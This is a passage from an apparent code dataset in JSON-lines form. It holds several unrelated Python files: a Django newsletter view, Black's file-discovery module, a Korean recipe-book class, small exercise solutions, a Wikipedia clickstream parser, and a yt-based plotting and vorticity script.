').format(request.build_absolute_uri(host),\n sub.email,\n sub.conf_num))\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e)\n\n return redirect('profile')\n\n\n else:\n form = MailMessageForm()\n context = {\n 'form' : form,\n }\n\n return render(request,'newsletter/runletter.html', context)\n\nclass UserNewsletterView (AdminStaffRequiredMixin, ListView):\n model=NewsletterUser\n template_name = 'newsletter/newsletter_user_list.html'\n \n\n","repo_name":"Klewiu/joyful_bees","sub_path":"src/apps/newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"70020911665","text":"import io\nimport os\nimport sys\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Pattern,\n Sequence,\n Tuple,\n Union,\n)\n\nfrom mypy_extensions import mypyc_attr\nfrom packaging.specifiers import InvalidSpecifier, Specifier, SpecifierSet\nfrom packaging.version import InvalidVersion, Version\nfrom pathspec import PathSpec\nfrom pathspec.patterns.gitwildmatch import GitWildMatchPatternError\n\nif sys.version_info >= (3, 11):\n try:\n import tomllib\n except ImportError:\n # Help users on older alphas\n if not TYPE_CHECKING:\n import tomli as tomllib\nelse:\n import tomli as tomllib\n\nfrom black.handle_ipynb_magics import jupyter_dependencies_are_installed\nfrom black.mode import TargetVersion\nfrom black.output import err\nfrom black.report import Report\n\nif TYPE_CHECKING:\n import colorama # noqa: F401\n\n\n@lru_cache\ndef find_project_root(\n srcs: Sequence[str], stdin_filename: Optional[str] = None\n) -> Tuple[Path, str]:\n \"\"\"Return a directory containing .git, .hg, or pyproject.toml.\n\n That directory will be a common parent of all files and directories\n passed in `srcs`.\n\n If no directory in the tree contains a marker that would specify it's the\n project root, the root of the file system is returned.\n\n Returns a two-tuple with the first element as the project root path and\n the second element as a string describing the method by which the\n project root was discovered.\n \"\"\"\n if stdin_filename is not None:\n srcs = tuple(stdin_filename if s == \"-\" else s for s in srcs)\n if not srcs:\n srcs = [str(Path.cwd().resolve())]\n\n path_srcs = [Path(Path.cwd(), src).resolve() for src in srcs]\n\n # A list of lists of parents for each 'src'. 'src' is included as a\n # \"parent\" of itself if it is a directory\n src_parents = [\n list(path.parents) + ([path] if path.is_dir() else []) for path in path_srcs\n ]\n\n common_base = max(\n set.intersection(*(set(parents) for parents in src_parents)),\n key=lambda path: path.parts,\n )\n\n for directory in (common_base, *common_base.parents):\n if (directory / \".git\").exists():\n return directory, \".git directory\"\n\n if (directory / \".hg\").is_dir():\n return directory, \".hg directory\"\n\n if (directory / \"pyproject.toml\").is_file():\n return directory, \"pyproject.toml\"\n\n return directory, \"file system root\"\n\n\ndef find_pyproject_toml(\n path_search_start: Tuple[str, ...], stdin_filename: Optional[str] = None\n) -> Optional[str]:\n \"\"\"Find the absolute filepath to a pyproject.toml if it exists\"\"\"\n path_project_root, _ = find_project_root(path_search_start, stdin_filename)\n path_pyproject_toml = path_project_root / \"pyproject.toml\"\n if path_pyproject_toml.is_file():\n return str(path_pyproject_toml)\n\n try:\n path_user_pyproject_toml = find_user_pyproject_toml()\n return (\n str(path_user_pyproject_toml)\n if path_user_pyproject_toml.is_file()\n else None\n )\n except (PermissionError, RuntimeError) as e:\n # We do not have access to the user-level config directory, so ignore it.\n err(f\"Ignoring user configuration directory due to {e!r}\")\n return None\n\n\n@mypyc_attr(patchable=True)\ndef parse_pyproject_toml(path_config: str) -> Dict[str, Any]:\n \"\"\"Parse a pyproject toml file, pulling out relevant parts for Black.\n\n If parsing fails, will raise a tomllib.TOMLDecodeError.\n \"\"\"\n with open(path_config, \"rb\") as f:\n pyproject_toml = tomllib.load(f)\n config: Dict[str, Any] = pyproject_toml.get(\"tool\", {}).get(\"black\", {})\n config = {k.replace(\"--\", \"\").replace(\"-\", \"_\"): v for k, v in config.items()}\n\n if \"target_version\" not in config:\n inferred_target_version = infer_target_version(pyproject_toml)\n if inferred_target_version is not None:\n config[\"target_version\"] = [v.name.lower() for v in inferred_target_version]\n\n return config\n\n\ndef infer_target_version(\n pyproject_toml: Dict[str, Any]\n) -> Optional[List[TargetVersion]]:\n \"\"\"Infer Black's target version from the project metadata in pyproject.toml.\n\n Supports the PyPA standard format (PEP 621):\n https://packaging.python.org/en/latest/specifications/declaring-project-metadata/#requires-python\n\n If the target version cannot be inferred, returns None.\n \"\"\"\n project_metadata = pyproject_toml.get(\"project\", {})\n requires_python = project_metadata.get(\"requires-python\", None)\n if requires_python is not None:\n try:\n return parse_req_python_version(requires_python)\n except InvalidVersion:\n pass\n try:\n return parse_req_python_specifier(requires_python)\n except (InvalidSpecifier, InvalidVersion):\n pass\n\n return None\n\n\ndef parse_req_python_version(requires_python: str) -> Optional[List[TargetVersion]]:\n \"\"\"Parse a version string (i.e. ``\"3.7\"``) to a list of TargetVersion.\n\n If parsing fails, will raise a packaging.version.InvalidVersion error.\n If the parsed version cannot be mapped to a valid TargetVersion, returns None.\n \"\"\"\n version = Version(requires_python)\n if version.release[0] != 3:\n return None\n try:\n return [TargetVersion(version.release[1])]\n except (IndexError, ValueError):\n return None\n\n\ndef parse_req_python_specifier(requires_python: str) -> Optional[List[TargetVersion]]:\n \"\"\"Parse a specifier string (i.e. ``\">=3.7,<3.10\"``) to a list of TargetVersion.\n\n If parsing fails, will raise a packaging.specifiers.InvalidSpecifier error.\n If the parsed specifier cannot be mapped to a valid TargetVersion, returns None.\n \"\"\"\n specifier_set = strip_specifier_set(SpecifierSet(requires_python))\n if not specifier_set:\n return None\n\n target_version_map = {f\"3.{v.value}\": v for v in TargetVersion}\n compatible_versions: List[str] = list(specifier_set.filter(target_version_map))\n if compatible_versions:\n return [target_version_map[v] for v in compatible_versions]\n return None\n\n\ndef strip_specifier_set(specifier_set: SpecifierSet) -> SpecifierSet:\n \"\"\"Strip minor versions for some specifiers in the specifier set.\n\n For background on version specifiers, see PEP 440:\n https://peps.python.org/pep-0440/#version-specifiers\n \"\"\"\n specifiers = []\n for s in specifier_set:\n if \"*\" in str(s):\n specifiers.append(s)\n elif s.operator in [\"~=\", \"==\", \">=\", \"===\"]:\n version = Version(s.version)\n stripped = Specifier(f\"{s.operator}{version.major}.{version.minor}\")\n specifiers.append(stripped)\n elif s.operator == \">\":\n version = Version(s.version)\n if len(version.release) > 2:\n s = Specifier(f\">={version.major}.{version.minor}\")\n specifiers.append(s)\n else:\n specifiers.append(s)\n\n return SpecifierSet(\",\".join(str(s) for s in specifiers))\n\n\n@lru_cache\ndef find_user_pyproject_toml() -> Path:\n r\"\"\"Return the path to the top-level user configuration for black.\n\n This looks for ~\\.black on Windows and ~/.config/black on Linux and other\n Unix systems.\n\n May raise:\n - RuntimeError: if the current user has no homedir\n - PermissionError: if the current process cannot access the user's homedir\n \"\"\"\n if sys.platform == \"win32\":\n # Windows\n user_config_path = Path.home() / \".black\"\n else:\n config_root = os.environ.get(\"XDG_CONFIG_HOME\", \"~/.config\")\n user_config_path = Path(config_root).expanduser() / \"black\"\n return user_config_path.resolve()\n\n\n@lru_cache\ndef get_gitignore(root: Path) -> PathSpec:\n \"\"\"Return a PathSpec matching gitignore content if present.\"\"\"\n gitignore = root / \".gitignore\"\n lines: List[str] = []\n if gitignore.is_file():\n with gitignore.open(encoding=\"utf-8\") as gf:\n lines = gf.readlines()\n try:\n return PathSpec.from_lines(\"gitwildmatch\", lines)\n except GitWildMatchPatternError as e:\n err(f\"Could not parse {gitignore}: {e}\")\n raise\n\n\ndef normalize_path_maybe_ignore(\n path: Path,\n root: Path,\n report: Optional[Report] = None,\n) -> Optional[str]:\n \"\"\"Normalize `path`. May return `None` if `path` was ignored.\n\n `report` is where \"path ignored\" output goes.\n \"\"\"\n try:\n abspath = path if path.is_absolute() else Path.cwd() / path\n normalized_path = abspath.resolve()\n try:\n root_relative_path = normalized_path.relative_to(root).as_posix()\n except ValueError:\n if report:\n report.path_ignored(\n path, f\"is a symbolic link that points outside {root}\"\n )\n return None\n\n except OSError as e:\n if report:\n report.path_ignored(path, f\"cannot be read because {e}\")\n return None\n\n return root_relative_path\n\n\ndef _path_is_ignored(\n root_relative_path: str,\n root: Path,\n gitignore_dict: Dict[Path, PathSpec],\n report: Report,\n) -> bool:\n path = root / root_relative_path\n # Note that this logic is sensitive to the ordering of gitignore_dict. Callers must\n # ensure that gitignore_dict is ordered from least specific to most specific.\n for gitignore_path, pattern in gitignore_dict.items():\n try:\n relative_path = path.relative_to(gitignore_path).as_posix()\n except ValueError:\n break\n if pattern.match_file(relative_path):\n report.path_ignored(\n path.relative_to(root), \"matches a .gitignore file content\"\n )\n return True\n return False\n\n\ndef path_is_excluded(\n normalized_path: str,\n pattern: Optional[Pattern[str]],\n) -> bool:\n match = pattern.search(normalized_path) if pattern else None\n return bool(match and match.group(0))\n\n\ndef gen_python_files(\n paths: Iterable[Path],\n root: Path,\n include: Pattern[str],\n exclude: Pattern[str],\n extend_exclude: Optional[Pattern[str]],\n force_exclude: Optional[Pattern[str]],\n report: Report,\n gitignore_dict: Optional[Dict[Path, PathSpec]],\n *,\n verbose: bool,\n quiet: bool,\n) -> Iterator[Path]:\n \"\"\"Generate all files under `path` whose paths are not excluded by the\n `exclude_regex`, `extend_exclude`, or `force_exclude` regexes,\n but are included by the `include` regex.\n\n Symbolic links pointing outside of the `root` directory are ignored.\n\n `report` is where output about exclusions goes.\n \"\"\"\n\n assert root.is_absolute(), f\"INTERNAL ERROR: `root` must be absolute but is {root}\"\n for child in paths:\n root_relative_path = child.absolute().relative_to(root).as_posix()\n\n # First ignore files matching .gitignore, if passed\n if gitignore_dict and _path_is_ignored(\n root_relative_path, root, gitignore_dict, report\n ):\n continue\n\n # Then ignore with `--exclude` `--extend-exclude` and `--force-exclude` options.\n root_relative_path = \"/\" + root_relative_path\n if child.is_dir():\n root_relative_path += \"/\"\n\n if path_is_excluded(root_relative_path, exclude):\n report.path_ignored(child, \"matches the --exclude regular expression\")\n continue\n\n if path_is_excluded(root_relative_path, extend_exclude):\n report.path_ignored(\n child, \"matches the --extend-exclude regular expression\"\n )\n continue\n\n if path_is_excluded(root_relative_path, force_exclude):\n report.path_ignored(child, \"matches the --force-exclude regular expression\")\n continue\n\n normalized_path = normalize_path_maybe_ignore(child, root, report)\n if normalized_path is None:\n continue\n\n if child.is_dir():\n # If gitignore is None, gitignore usage is disabled, while a Falsey\n # gitignore is when the directory doesn't have a .gitignore file.\n if gitignore_dict is not None:\n new_gitignore_dict = {\n **gitignore_dict,\n root / child: get_gitignore(child),\n }\n else:\n new_gitignore_dict = None\n yield from gen_python_files(\n child.iterdir(),\n root,\n include,\n exclude,\n extend_exclude,\n force_exclude,\n report,\n new_gitignore_dict,\n verbose=verbose,\n quiet=quiet,\n )\n\n elif child.is_file():\n if child.suffix == \".ipynb\" and not jupyter_dependencies_are_installed(\n warn=verbose or not quiet\n ):\n continue\n include_match = include.search(root_relative_path) if include else True\n if include_match:\n yield child\n\n\ndef wrap_stream_for_windows(\n f: io.TextIOWrapper,\n) -> Union[io.TextIOWrapper, \"colorama.AnsiToWin32\"]:\n \"\"\"\n Wrap stream with colorama's wrap_stream so colors are shown on Windows.\n\n If `colorama` is unavailable, the original stream is returned unmodified.\n Otherwise, the `wrap_stream()` function determines whether the stream needs\n to be wrapped for a Windows environment and will accordingly either return\n an `AnsiToWin32` wrapper or the original stream.\n \"\"\"\n try:\n from colorama.initialise import wrap_stream\n except ImportError:\n return f\n else:\n # Set `strip=False` to avoid needing to modify test_express_diff_with_color.\n return wrap_stream(f, convert=None, strip=False, autoreset=False, wrap=True)\n","repo_name":"psf/black","sub_path":"src/black/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":13928,"program_lang":"python","lang":"en","doc_type":"code","stars":35485,"dataset":"github-code","pt":"91"}
+{"seq_id":"74527546862","text":"from Recipe import Recipe\n\nclass RecipeBook:\n def __init__(self):\n self.recipe_list = []\n self.init_recipe()\n\n def add_recipe(self):\n # 추가할 레시피 이름 입력\n name = input('레시피의 이름을 입력하세요 : ')\n\n # 중복 체크\n for recipe in self.recipe_list:\n if name == recipe.name: # 중복되는 레시피가 있으면 중복이라고 표기\n print('이미 존재하는 레시피입니다.')\n return # 빠져 나오기\n\n # 중복되는 레시피가 없으면 추가\n # 레시피 생성\n new_recipe = Recipe(name)\n new_recipe.set_recipe()\n\n # 레시피 리스트에 생성한 레시피 추가하기\n self.recipe_list.append(new_recipe)\n\n def show_recipe(self):\n for index, recipe in enumerate(self.recipe_list):\n print(f'{index + 1}')\n print(recipe)\n\n def search_recipe(self):\n # 찾은 레시피\n searched_recipe = []\n\n # 레시피 이름 입력받기\n name = input('원하는 레시피를 검색하세요 : ')\n\n # 레시피의 이름이 검색한 이름과 같은지 확인\n for recipe in self.recipe_list:\n if name == recipe.name: # 같으면 레시피 보여주기\n print(recipe)\n searched_recipe.append(recipe)\n\n if len(searched_recipe) == 0: # 검색한 레시피가 없으면\n # 추가할지 물어보기\n answer = input('찾는 레시피가 없습니다. 레시피를 추가하시겠습니까? 1 : yes, 1 이외의 숫자 : no')\n\n if answer == 1: # 1을 입력했을 때\n # 레시피 추가하기\n self.add_recipe()\n else: # 1이 아닌 다른 숫자를 입력했을 때\n return\n\n # 재료로 메뉴 검색하기\n def search_ingrediant(self):\n # 빈 set 생성\n all_ingrediant = set()\n\n # 레시피북의 레시피 재료 set에 넣기\n for recipe in self.recipe_list:\n for ingrediant in recipe.ingrediant:\n all_ingrediant.add(ingrediant)\n\n # 모든 재료 보여주기\n for index, ingrediant in enumerate(all_ingrediant):\n print(f'{index + 1}, {ingrediant}')\n\n # 찾을 재료 이름 검색하기\n search_num = int(input('사용할 재료를 입력하세요 : '))\n search_ingrediant = list(all_ingrediant)[search_num-1]\n\n # 입력한 재료가 포함되�� 레시피 모두 보여주기\n for recipe in self.recipe_list:\n # 입력한 재료가 포함되면\n if search_ingrediant in recipe.ingrediant:\n # 레시피 모두 보여주기\n print(recipe)\n \n def init_recipe(self):\n 떡볶이 = Recipe('떡볶이')\n 떡볶이.people = 2 # 1\n 떡볶이.video = 'youtube.com' # ''\n 떡볶이.ingrediant = {'물': '100', '떡': '100', '고추장': '100'} # {}\n \n self.recipe_list.append(떡볶이)\n\n 카레 = Recipe('카레')\n 카레.ingrediant = {'카레가루': '150', '감자': '100', '당근': '100'}\n\n self.recipe_list.append(카레)\n \n 파스타 = Recipe('파스타')\n 파스타.contents = '맛있게 만드세요!'\n 파스타.ingrediant = {'면': '100', '소스': '200'}\n\n self.recipe_list.append(파스타)\n\n def __str__(self):\n pass","repo_name":"Endel04/pythonProject","sub_path":"Class/Recipebook.py","file_name":"Recipebook.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"2640000736","text":"import time\n\ndef is_trio(a, b, c):\n if a**2 + b**2 == c**2 and a < b and b < c:\n return True\n return False\nstart = time.time()\nflag = False\nfor a in range(1, 1000):\n for b in range(a, 1000):\n for c in range(b, 1000):\n if is_trio(a, b, c) and a + b + c == 1000:\n print(a, b, c)\n flag = True\n break\n if flag:\n break\n if flag:\n break\nprint(time.time() - start)\n","repo_name":"ostapkob/Euler","sub_path":"Python/p009.py","file_name":"p009.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"25641806148","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 10 22:57:30 2023\n\n@author: yesenia\n\"\"\"\nres = \"\"\nn = int (input())\nfor i in range(1 , n +1):\n if i % 2 == 0:\n res += str(i) + \" \"\n \nif len(res)== 0:\n print(\"Nada que imprimir\")\nelse:\n print(res)\n \n ","repo_name":"yesenia0490/practica_python","sub_path":"omegaup_pares.py","file_name":"omegaup_pares.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"3654779024","text":"import os\nimport gzip\nimport pickle\nimport argparse\nfrom collections import defaultdict\n\n\nparser = argparse.ArgumentParser(description='Process graphs.')\nparser.add_argument('--lang', type=str, help='topic name')\n\nargs = parser.parse_args()\n\nlang = args.lang\nfolder = 'data/dumps/clickstreams/'\nlist_files = [f for f in os.listdir(folder) if f.startswith('clickstream-{}wiki'.format(lang))]\n\ndata_files = [folder+f for f in list_files]\nprint(data_files[0])\ntitle_id = {}\nwith open('data/wikipedia_all/' + 'id_title.txt', 'r') as f:\n for l in f:\n idx, title = l.split('\\t')\n \n title_id[title.strip()] = idx\nprint('Dictionary of title and respective ids has been loaded.')\n\n\nclickstream_dictionary = defaultdict(int)\nentrance_dictionary = defaultdict(int)\n#monthly_click = {}\nmonthly_entrance = {}\n\nfor raw_click in data_files:\n print(raw_click)\n date = '_'.join(raw_click.split('.')[0].split('-')[-2:])\n #monthly_click[date] = {}\n monthly_entrance[date] = {}\n with gzip.open(raw_click,'rt') as f:\n for line in f:\n title_out, title_in, kind, clicks = line.split('\\t')\n # decode titles\n try:\n #if kind == 'internal':\n out = title_id[title_out]#.lower()] \n in_ = title_id[title_in.strip()]#.lower()]\n clickstream_dictionary[(out, in_)] += int(clicks.strip())\n #monthly_click[date][(out, in_)] = int(clicks.strip())\n except KeyError:\n try:\n #if kind=='external':\n in_ = title_id[title_in.strip()]#.lower()]\n entrance_dictionary[in_] += int(clicks.strip())\n monthly_entrance[date][in_] = int(clicks.strip())\n except:\n continue\n continue\n\n #with open('data/wikipedia_all/' + lang + '_' + str(date) + '_monthly_click' + '.p', 'wb') as f:\n # pickle.dump(monthly_click, f)\nwith open('data/wikipedia_all/' + lang + '_clickstreams' + '.p', 'wb') as f:\n pickle.dump(clickstream_dictionary, f)\n\nwith open('data/wikipedia_all/' + lang + '_enter_external' + '.p', 'wb') as f:\n pickle.dump(entrance_dictionary, f)\n\nwith open('data/wikipedia_all/' + lang + '_monthly_entrance' + '.p', 'wb') as f:\n pickle.dump(monthly_entrance, f)\n\n","repo_name":"CriMenghini/WikiNetBias","sub_path":"code/clickstream_extraction.py","file_name":"clickstream_extraction.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"14036029631","text":"import yt\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import log\r\n\r\ndef olr(a): #outlier range for CB labelling\r\n\tq1 = np.percentile(a,25)\r\n\tq3 = np.percentile(a,75)\r\n\tiqr = q3-q1\r\n\treturn([q1-1.5*iqr,q3+1.5*iqr])\r\n\r\ndef arrMin(nc):\r\n\ttry:\r\n\t\treturn(nc.min())\r\n\texcept:\r\n\t\treturn(min(nc))\r\n\r\ndef arrMax(nc):\r\n\ttry:\r\n\t\treturn(nc.max())\r\n\texcept:\r\n\t\treturn(max(nc))\r\n\r\ndef plot(nx,ny,nc,cbname,fname,text=\"\"):\r\n\t# print(\"{}.png loading\".format(fname))\r\n\tprint(\"{}: min = {} , max = {}\".format(fname, arrMin(nc), arrMax(nc)))\r\n\tplt.clf()\r\n\t# plt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=-0.01, vmax=0.01)\r\n\r\n\t# Uses extrema cutoffs for CB range\r\n\tplt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=arrMin(nc), vmax=arrMax(nc))\r\n\r\n\t# Uses outlier cutoffs for CB range\r\n\t# plt.scatter(nx, ny, c=nc, marker='o', edgecolor='none', vmin=olr(nc)[0], vmax=olr(nc)[1])\r\n\r\n\tplt.xlim(0,1)\r\n\tplt.ylim(-0.5,0.5)\r\n\tplt.gca().set_position((.1, .3, .8, .6))\r\n\r\n\tplt.xlabel('x (cm)', fontsize=18)\r\n\tplt.ylabel('y (cm)', fontsize=18)\r\n\tplt.title(fname, fontsize=18)\r\n\tcb = plt.colorbar()\r\n\tcb.set_label(cbname, fontsize=18)\r\n\tplt.gcf().set_size_inches(12,10)\r\n\r\n\tplt.figtext(.02,.02,text)\r\n\r\n\tplt.savefig(\"{}.png\".format(fname)) #Uncomment to save image\r\n\t# plt.show() #Uncomment to show image\r\n\r\ndef quiverPlot(nx,ny,nc,cbname,fname,text=\"\"):\r\n\tX, Y = nx, ny\r\n\tU = nc[0]\r\n\tV = nc[1]\r\n\r\n\tplt.clf()\r\n\r\n\t# plt.figure()\r\n\t# plt.title('Arrows scale with plot width, not view')\r\n\t# Q = plt.quiver(nx, ny, U, V, units='width')\r\n\t# qk = plt.quiverkey(Q, 0.9, 0.9, 2, r'$2 \\frac{m}{s}$', labelpos='E',\r\n\t# coordinates='figure')\r\n\r\n\tplt.figure()\r\n\tplt.title(fname)\r\n\tk = 5\r\n\tQ = plt.quiver(X[::k, ::k], Y[::k, ::k], U[::k, ::k], V[::k, ::k], np.hypot(U, V),\r\n\t pivot='tip')\r\n\tqk = plt.quiverkey(Q, 0.9, 0.9, 1, r'$1 \\frac{m}{s}$', labelpos='E',\r\n\t coordinates='figure')\r\n\tplt.scatter(X[::k, ::k], Y[::k, ::k], color='r', s=1)\r\n\r\n\t# plt.figure()\r\n\t# plt.title(\"pivot='tip'; scales with x view\")\r\n\t# M = np.hypot(U, V)\r\n\t# Q = plt.quiver(X, Y, U, V, M, units='x', pivot='tip', width=0.001,\r\n\t# scale=1 / 0.15)\r\n\t# plt.scatter(X, Y, color='k', s=1)\t\r\n\r\n\tplt.savefig(\"{}.png\".format(fname))\r\n\r\n# Replaced with numpy array subtraction\r\ndef diff(a,b): #Returns difference between datasets\r\n\treturn([a[i] - b[i] for i in range(min(len(a),len(b)))])\r\n\r\ndef diffstats(ndiff):\r\n\t# Find relevant stats from ndiff\r\n\t# min = ndiff[0]\r\n\t# max = ndiff[0]\r\n\t# absmin = abs(ndiff[0])\r\n\tabsmax = abs(float(ndiff[0][0]))\r\n\tRSS = 0\r\n\tfor row in ndiff:\r\n\t\tfor i in row:\r\n\t\t\t# if i < velymin:\r\n\t\t\t# \tvelymin = i\r\n\t\t\t# if i > velymax:\r\n\t\t\t# \tvelymax = i\r\n\t\t\t# if abs(i) < velyabsmin:\r\n\t\t\t# \tvelyabsmin = abs(i)\r\n\t\t\tif abs(float(i)) > absmax:\r\n\t\t\t\tabsmax = abs(float(i))\r\n\r\n\t\t\tRSS += float(i)**2\r\n\r\n\treturn({\"absmax\" : absmax, \"absmaxr\" : round(absmax,5), \"RSS\" : RSS, \"RSSr\" : round(RSS,5)})\r\n\r\n# Arguments are two datasets; specified parameter of interest; verbose parameter; color bar label; file name\r\ndef diffAnalysis(ds0, ds1, poi, poiv, cbname, fname):\r\n\t# ad0 = ds0.all_data()\r\n\t# ad1 = ds1.all_data()\r\n\tad0 = ds0.covering_grid(level=0, left_edge=ds0.index.grids[0].LeftEdge, dims=ds0.domain_dimensions)\r\n\tad1 = ds1.covering_grid(level=0, left_edge=ds1.index.grids[0].LeftEdge, dims=ds1.domain_dimensions)\r\n\t\r\n\t# Retrive relevant data from grid: x, y, vely\r\n\tnx = [np.array(ad0[\"x\"]), np.array(ad1[\"x\"])]\r\n\tny = [np.array(ad0[\"y\"]), np.array(ad1[\"y\"])]\r\n\t\r\n\tnpoi = [np.array(ad0[poi]), np.array(ad1[poi])]\r\n\t# ndiff = diff(npoi[0],npoi[1])\r\n\tndiff = npoi[0]-npoi[1]\r\n\r\n\tstats = diffstats(ndiff)\r\n\tstatsv = \"Greatest Absolute Difference in {} = {}\" \\\r\n\t\t\"\\nSum of Squared Residuals (Measure of total discrepancy) = {}\" \\\r\n\t\t.format(poiv,stats[\"absmaxr\"],stats[\"RSSr\"])\r\n\r\n\t# plot(nx[0],ny[0],cbvely,nvely[0],\"khv0\") Uncomment asap\r\n\t# plot(nx[1],ny[1],cbvely,nvely[1],\"khv1\")\r\n\tplot(nx[0],ny[0],ndiff,cbname,fname,statsv)\r\n\r\n# Arguments are a dataset; specified parameter of interest; verbose parameter; color bar label; file name\r\ndef visualize(ds, poi, poiv, cbname, fname):\r\n\t# ad = ds.all_data()\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\t# Retrive relevant data from grid: x, y, vely\r\n\tnx = np.array(ad[\"x\"])\r\n\tny = np.array(ad[\"y\"])\r\n\t\r\n\tnpoi = np.array(ad[poi])\r\n\r\n\tplot(nx,ny,npoi,cbname,fname)\r\n\r\n# Arguments are two datasets; specified field of interest; verbose field; color bar label; file name\r\ndef fieldAnalysis(ds, foi, foiv, cbname, fname):\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\r\n\tplot(x,y,foi(ad),cbname,fname)\r\n\r\ndef fieldAnalysisQuiver(ds, foi, foiv, cbname, fname):\r\n\tad = ds.covering_grid(level=0, left_edge=ds.index.grids[0].LeftEdge, dims=ds.domain_dimensions)\r\n\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\r\n\tquiverPlot(x,y,foi(ad),cbname,fname)\r\n\r\ndef vorticity(ad):\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\thx = float(x[1,0]-x[0,0])\r\n\thy = float(y[0,1]-y[0,0])\r\n\r\n\tvelx = np.array(ad[\"velx\"])\r\n\tvely = np.array(ad[\"vely\"])\r\n\t\r\n\t# dvelydx = np.zeros((len(x),len(x[0])))\r\n\t# dvelxdy = np.zeros((len(x),len(x[0])))\r\n\tdvelydx = finiteDiffX(x, y, vely)\r\n\tdvelxdy = finiteDiffY(x, y, velx)\r\n\tvort = np.zeros((len(x),len(x[0])))\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\t# Calculates vorticity\r\n\t\t\t# vort[i,j] = dvelydx[i,j] - dvelxdy[i,j]\r\n\r\n\t\t\t# Absolute Value\r\n\t\t\t# vort[i,j] = abs(dvelydx[i,j] - dvelxdy[i,j])\r\n\r\n\t\t\t# Log Scale\r\n\t\t\tvort[i,j] = log(abs(dvelydx[i,j] - dvelxdy[i,j]))\r\n\r\n\t\t\t# Log Scale\r\n\t\t\t# vort[i,j] = log(abs(dvelydx[i,j]))\r\n\r\n\treturn(vort)\r\n\r\ndef gradient(ad):\r\n\tx = np.array(ad[\"x\"])\r\n\ty = np.array(ad[\"y\"])\r\n\thx = float(x[1,0]-x[0,0])\r\n\thy = float(y[0,1]-y[0,0])\r\n\r\n\tvelx = np.array(ad[\"velx\"])\r\n\tvely = np.array(ad[\"vely\"])\r\n\t\r\n\t# dvelydx = np.zeros((len(x),len(x[0])))\r\n\t# dvelxdy = np.zeros((len(x),len(x[0])))\r\n\tdvelxdx = finiteDiffX(x, y, velx)\r\n\tdvelydy = finiteDiffY(x, y, vely)\r\n\tgradMag = np.zeros((len(x),len(x[0])))\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\t# Calculates vorticity\r\n\t\t\t# grad[i,j] = [dvelxdx[i,j], dvelydy[i,j]]\r\n\r\n\t\t\t# Magnitude\r\n\t\t\t# grad[i,j] = (dvelxdx[i,j]**2 + dvelydy[i,j]**2)**(0.5)\r\n\r\n\t\t\t# Log Scale\r\n\t\t\tgradMag[i,j] = log((dvelxdx[i,j]**2 + dvelydy[i,j]**2)**(0.5))\r\n\r\n\t# return(gradMag)\r\n\treturn(dvelxdx, dvelydy)\r\n\r\ndef finiteDiffX(ax, ay, ac):\r\n\tx = np.array(ax)\r\n\ty = np.array(ay)\r\n\tc = np.array(ac)\r\n\tdc = np.zeros((len(x),len(x[0])))\r\n\r\n\thx = float(x[1,0]-x[0,0])\r\n\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\tif i > 0 and i < len(x)-1:\r\n\t\t\t\tdc[i,j] = (-0.5*c[i-1,j] + 0.5*c[i+1,j])/hx\r\n\t\t\telse:\r\n\t\t\t\tif i == 0:\r\n\t\t\t\t\tdc[i,j] = (-1.5*c[i,j] + 2*c[i+1,j] - 0.5*c[i+2,j])/hx\r\n\t\t\t\tif i == len(x)-1:\r\n\t\t\t\t\tdc[i,j] = (1.5*c[i-2,j] - 2*c[i-1,j] + 1.5*c[i,j])/hx\r\n\r\n\treturn(dc)\r\n\r\ndef finiteDiffY(ax, ay, ac):\r\n\tx = np.array(ax)\r\n\ty = np.array(ay)\r\n\tc = np.array(ac)\r\n\tdc = np.zeros((len(x),len(x[0])))\r\n\r\n\thy = float(y[0,1]-y[0,0])\r\n\t\r\n\t# Finite differences used; with accuracy 2\r\n\tfor i in range(len(x)):\r\n\t\tfor j in range(len(x[i])):\r\n\t\t\tif j > 0 and j < len(y)-1:\r\n\t\t\t\tdc[i,j] = (-0.5*c[i,j-1] + 0.5*c[i,j+1])/hy\r\n\t\t\telse:\r\n\t\t\t\tif j == 0:\r\n\t\t\t\t\tdc[i,j] = (-1.5*c[i,j] + 2*c[i,j+1] - 0.5*c[i,j+2])/hy\r\n\t\t\t\tif j == len(y)-1:\r\n\t\t\t\t\tdc[i,j] = (1.5*c[i,j-2] - 2*c[i,j-1] + 